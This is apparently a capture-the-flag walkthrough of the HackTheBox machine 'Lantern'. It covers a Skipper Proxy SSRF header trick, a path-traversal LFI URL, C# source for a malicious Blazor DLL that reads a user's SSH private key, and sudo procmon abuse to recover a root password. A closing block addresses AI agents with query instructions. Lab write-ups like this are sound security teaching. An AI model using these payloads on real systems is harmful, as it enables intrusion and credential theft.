You should be redirected automatically to the target URL: http://lantern.htb/. If not, click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| Content-Type: text/html; charset=utf-8
| Date: Sun, 18 Aug 2024 02:30:51 GMT
|_ Server: Skipper Proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=8/18%Time=66C15F08%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2018\x20A
SF:ug\x202024\x2002:30:51\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nS
SF:erver:\x20Skipper\x20Proxy\r\n\r\n\n
SF:\nRedirecting\.\.\.\n
T
SF:he\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\
SF:x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x2
SF:0your\x20spelling\x20and\x20try\x20again\.
\n")%r(GenericLines,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(He
SF:lp,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1166.77 seconds
```
Accessing the web server will see a response showing that the server is using Skipper Proxy and the web platform is Blazor which may contain SSRF vulnerabilities.
Link contain exploit this vuln from exploit DB :
The vuln perform we can unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
From the enumeration, the subdomain can determine that the web server also contains the LFI vulnerability, which should be give us much sensitive data for later testing.
## LFI :
```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/combined_directories.txt -u http://lantern.htb/FUZZ -t 100
```
This command only provide subdomain "PrivacyAndPolicy" , to get futher , try LFI wordlists and burpsuite to find it
Discover from : [http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/host\&ext=conf ]()
It will take least 30' to scan through this subdomain
Keep trying on this will get the content of file app.py and some more cool file .
Notice port 8000 seem reachable, let test more default port service
## SSRF :
Port 3000,8000,5000 is often used by web applications or local services on the server. In this case, when checking for an X-Skipper-Proxy SSRF (Server-Side Request Forgery) lock, the goal of the job is to send a request with an X-Skipper-Proxy header pointing to to check if the proxy can be used to access a local service running on the server.
This service is usually not declared on the Internet and is only accessible from within the system (localhost). If the proxy is affected by an SSRF lock, an attacker can take advantage of this to send requests to internal services that are normally not accessible from the outside.
Port 5000 is often the default port for web applications using Flask (a Python microframework) or other compatible services. Therefore, you can check if Skipper Proxy can be exploited to access a local service set running on this port.
If the request returns a response from port 5000, it means that the proxy can be exploited to access the internal service, confirming that the SSRF vulnerability exists on the system.
## Note
* The `_framework` directory is specific to certain web application frameworks, particularly **Blazor** applications in ASP.NET Core. -> will discover on this
* **Blazor**: `_framework` is a directory commonly seen in Blazor applications, which are part of the ASP.NET Core framework developed by Microsoft. Blazor allows developers to build interactive web applications using C# instead of JavaScript.
* And scanning the `/framework/` directory in a Blazor or ASP.NET Core application, it makes sense to focus on `.dll file extension.`
But unfotunaltly non of my wordlist can found the correct file .dll on that .
From LFI , discover : /\_framework/InternaLantern.dll -> download this file and analyze it with dotpeak or ilpsy : remember to add X-Skipper-Proxy ( do it with burp suite , add the header X-Skipper-Proxy with ip is localhost port 5000 ( this from testing ) and forward it will get the file .
move to Proxy and Forward to get the file
Use dotpeak can help analyhze file write by dotNet much easier :
got the password admin to login at port 3000 from decode base64
On port 3000 can login as admin with that password :
## User
With upload content module -> we need to change the path to /opt/components/, by default it uploads to " Upload directory /var/www/sites/lantern.htb/static/images " like picture i capture above .
Burpsuite extension will help for this :
Download it from link or in burpsuite :
The menu after installed successful :
So server framework is .NET -> upload file DLL to trigger with File Upload vuln :
make the file .dll for the exploit first , we can try somethings like revershell , for short i willl take the ssh\_keys ( it's have ) . :
```
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;
namespace exploit
{
public class Component : ComponentBase
{
protected override void BuildRenderTree(RenderTreeBuilder builder)
{
base.BuildRenderTree(builder);
// Read the content of the sensitive file
string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");
// Add the content to the render tree
builder.AddContent(0, file);
}
}
}
```
Why tomas -> it from trace around the server with LFI , also find a email message from tomas too which will help root ( later ) .( var/tomas/mails)
Step by step build this :
\
1.**Create a New Class Library:**
Open your terminal and run the following command to create a new class library project:
```
dotnet new classlib -n exploit
```
This creates a new directory named `exploit` with the basic files for a class library project.
**2.Navigate to the Project Directory:**
Change to the newly created `exploit` directory:
```
cd exploit
```
3.**Add the Necessary Package:**
Add the required package for Blazor components:
```
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0
```
This command adds the `Microsoft.AspNetCore.Components` package to your project, which is necessary for creating the Blazor component.
**4.Modify the `Class1.cs` File:**
Open the `Class1.cs` file in a text editor with the code i give above and save file.
5.**Build the Project:**
Now, build the project in Release mode:
```
dotnet build -c Release
```
This command compiles the code and generates the `exploit.dll` file in the `bin/Release/net6.0/` directory.
After this will get the file and now upload it to server .
Upload and send to BTP tab
Derialize the input and change the value of name filed with the LFI recon and copy and change from JSON->Blazor
need the the name filed here
Serialize it :
Copy and overwrite it in proxy tab :
output successful :
Search this module ( the file name upload ís the module need to search ) will get the id\_rsa key :
Now copy id\_rsa key , add permision ( 600 ) and use ssh connect it will get the user flag tomas
## Root
sudo -l can help a first looking on it :
Will see `(ALL : ALL) NOPASSWD: /usr/bin/procmon` can run with sudo -> check process now :
ps: Displays information about running processes.
-a: Displays all processes related to all users, not just the current user's processes.
-e: Similar to -a, but lists all processes running on the system.
-f: Displays full-format listing, including PID (Process ID), PPID (Parent Process ID), UID (User ID), status, creation time, and full command.
```
sudo /usr/bin/procmon -p pid_of_process_in_picture -e write
```
Wait for few minutes and hit F6 -> it's will export a db file in dicrectory -> transfer this to attack machine then access it .
i change the name to easy for transfer file
Transfer it to attack machine :
Access with sqlite3 can grap some infomation
From now find around all tables and data in it, at here i will make it easier is focus on result code -> could be the result or status code returned by a system call or function.
There are so many command at here so need trace for a while , i will put command in another file to analyze with sql command extract :
```
SELECT hex(substr(arguments, 9, resultcode))
FROM ebpf
WHERE resultcode > 0
ORDER BY timestamp;
```
decode it from hex because had encode all command extract in hex ( just for sure it's correct so suggest is encode it as hex for easier copy ) :
Download it from cyberchef afer decode , baisctly will see command like : `echo Q 33EEddddttddww33ppMMB`
and remove duplicate will got the password of root :
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://kayiyan.gitbook.io/hacking-note/hackthebox-machine/lantern.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.